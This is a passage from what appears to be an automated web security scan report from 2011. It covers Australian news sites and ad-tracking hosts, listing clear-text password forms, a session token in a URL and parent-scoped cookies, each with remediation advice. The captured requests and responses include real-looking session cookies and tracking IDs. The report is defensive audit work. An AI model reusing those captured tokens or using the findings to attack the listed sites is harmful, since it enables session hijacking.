Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...
L)){j.referringURL=""}}if(v){t=h(v,"&","=");k(t.a,j.loggedInMsg,j.loginContainer);n(j)}else{if(j.autoLogout){n(j)}}}function e(t,u,y,w,x,v){if(!c(t+" #abc_pluck-login-form").length){c(t).append('\n\t\t<form id="abc_pluck-login-form" action="#" method="'+v+'">\n\t\t\t<fieldset>
...[SNIP]...
</label>\n\t\t\t\t<input type="password" id="abc_pluck-login-form-password" name="'+y+'" size="16" maxlength="16" value="" />\n\n\t\t\t\t<input type="hidden" id="abc_pluck-login-form-referrer" name="'+w+'" value="'+x+'" />
...[SNIP]...

5.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.watoday.com.au/action/membershipLoginAction

The form contains the following password field:

commentFrmPasswordLogin

Request

GET /wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: www.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422870964; k_visit=1; __utma=209218509.1580993531.1315422892.1315422892.1315422892.1; __utmb=209218509.1.10.1315422892; __utmc=209218509; __utmz=209218509.1315422892.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 132525
Content-Type: text/html;charset=UTF-8
Date: Wed, 07 Sep 2011 14:20:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<form name="commentLoginForm" action="/action/membershipLoginAction" method="post" data-validatable="true" data-ajaxSubmit="true">
<fieldset>
...[SNIP]...
<input type="hidden" id="commentFrmPasswordLoginEncrypted" name="commentFrmPasswordLoginEncrypted"/>
<input type="password" id="commentFrmPasswordLogin" name="commentFrmPasswordLogin" data-encryptable="true" data-validations="mandatory tooLong tooShort" data-inlineError="true" data-errorContainer="true" data-mandatoryMessage="A Password is required." data-tooLongLength="20" data-tooLongMessage="Your Password must be less than 20 characters." data-tooShortLength="3" data-tooShortMessage="Your Password must be more than 4 characters."/>
<span class="note error">
...[SNIP]...

6. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=135447496484311&app_id=135447496484311&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e34f8%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a74e1c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bc6f7cb4%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9093e24%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12efd808c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&sdk=joey&session_origin=1&session_version=3

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=135447496484311&app_id=135447496484311&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e34f8%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a74e1c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bc6f7cb4%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9093e24%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12efd808c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.25.26
X-Cnection: close
Date: Wed, 07 Sep 2011 14:14:43 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=f9093e24&origin=http\u00253A\u00252F\u00252Fwww.perthnow.com.au\u00252Ff1e2ba23a8&relation=parent&transport=postmessage&frame=f1c723d684", "http:
...[SNIP]...

7. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

The form contains the following password field:

'+y+'

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

Response

8. Cookie scoped to parent domain previous next
There are 83 instances of this issue:

http://api.twitter.com/1/statuses/user_timeline.json
http://a.triggit.com/pxrucm
http://ad.agkn.com/iframe!t=1131!
http://b.scorecardresearch.com/b
http://bh.contextweb.com/bh/rtset
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://cm.au.thewest.overture.com/js_flat_1_0/
http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj
http://i.w55c.net/a.gif
http://i.w55c.net/m.gif
http://i.w55c.net/m_yahoo.gif
http://i.w55c.net/ping_match.gif
http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif
http://image2.pubmatic.com/AdServer/Pug
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js
http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js
http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/dk.js
http://optimized-by.rubiconproject.com/a/dk.js
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pluck.abc.net.au/ver1.0/daapi2.api
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F
http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F
http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F
http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://rc.d.chango.com/m/rc
http://rp.gwallet.com/r1/ruum
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://user.lucidmedia.com/clicksense/user
http://www.abc.net.au/includes/scripts/global.js
http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css
http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css
http://www.abc.net.au/local/global_css/common_modules/m60_login.css
http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css
http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css
http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css
http://www.abc.net.au/local/global_css/news/styles.css
http://www.abc.net.au/local/global_css/palettes/generic.css
http://www.abc.net.au/local/global_css/palettes/paletteA.css
http://www.abc.net.au/local/global_css/styles.css
http://www.abc.net.au/local/global_css/template/styles.css
http://www.abc.net.au/local/global_css/yaml/central_draft.css
http://www.abc.net.au/local/global_css/yaml/core/slim_base.css
http://www.abc.net.au/local/global_scripts/contribute/functions.js
http://www.abc.net.au/local/global_scripts/general.min.js
http://www.abc.net.au/local/includes/scripts/city_include.js
http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js
http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js
http://www.abc.net.au/res/abc/styles/screen.css
http://www.abc.net.au/res/libraries/abcjs/abc.js
http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js
http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js
http://www.wtp101.com/pull_sync

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

8.1. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJaQPUQyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWYy%250AYzc4ZTc0ODZjMjg4MmI3MmU3NGE3MjNmZTA1OGFiOgxjc3JmX2lkIiVkOWY4%250ANDM5YmZkMWZkNDM4MjliNzA5NGFlZWIzZmRiZg%253D%253D--6c7b0340f09028e47b9b2e51788093d370f5d1f0; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A13154049095134771; domain=.twitter.com; path=/; expires=Sat, 07 Sep 2013 02:15:09 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=6PR&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1315422890878=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; k=50.23.123.106.1315399813016770

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315404909-73233-31934
X-RateLimit-Limit: 150
ETag: "edc1631aa3b276626127bfaca5c64c3d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 07 Sep 2011 14:15:09 GMT
X-RateLimit-Remaining: 127
X-Runtime: 0.03682
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114b25934d0
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9262dbfaae94eed8e5d327795189a6f9e3fa6b14
X-RateLimit-Reset: 1315408477
Set-Cookie: guest_id=v1%3A13154049095134771; domain=.twitter.com; path=/; expires=Sat, 07 Sep 2013 02:15:09 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJaQPUQyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWYy%250AYzc4ZTc0ODZjMjg4MmI3MmU3NGE3MjNmZTA1OGFiOgxjc3JmX2lkIiVkOWY4%250ANDM5YmZkMWZkNDM4MjliNzA5NGFlZWIzZmRiZg%253D%253D--6c7b0340f09028e47b9b2e51788093d370f5d1f0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 13688
Connection: close

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"coordinates":null,"in_reply_to_user_id":null,"contributors":null,"retweeted":false,"retweet_count":7,"id_str":"111365530862108672","retw
...[SNIP]...

8.2. http://a.triggit.com/pxrucm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.triggit.com
Path:	/pxrucm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trgu=f0be7f74-7052-4a09-8aa0-ca59d82b3888; domain=.triggit.com; path=/; expires=Wed, 07-Sep-2016 00:00:00 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pxrucm HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: trgu=f0be7f74-7052-4a09-8aa0-ca59d82b3888; domain=.triggit.com; path=/; expires=Wed, 07-Sep-2016 00:00:00 GMT;
Location: http://pixel.rubiconproject.com/tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

8.3. http://ad.agkn.com/iframe!t=1131! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

8.4. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Fri, 06-Sep-2013 14:14:17 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6864322&rn=0.7252024607732892&c7=http%3A%2F%2Fweb.adblade.com%2Fimps.php%3Fapp%3D3695%26ad_width%3D300%26ad_height%3D250%26title_font%3D1%26title_color%3D000000%26description_font%3D1%26description_color%3D0066cc%26id%3D83%26output%3Dhtml%26tpUrl%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000801647%2Fmnum%3D0000905406%2Fcstr%3D35058392%3D_4e677c35%2C2342476011%2C801647%5E905406%5E1184%5E0%2C1_%2Fxsxdata%3D%24xsxdata%2Fbnum%3D35058392%2Foptn%3D64%3Ftrg%3Dhttp%253a%252f%252fwww.adblade.com&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http%3A%2F%2Fwww.perthnow.com.au%2F&cv=1.8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Fri, 06-Sep-2013 14:14:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

8.5. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Sat, 01-Sep-2012 14:16:01 GMT; Path=/
pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Thu, 06-Sep-2012 14:16:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535039&ev=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
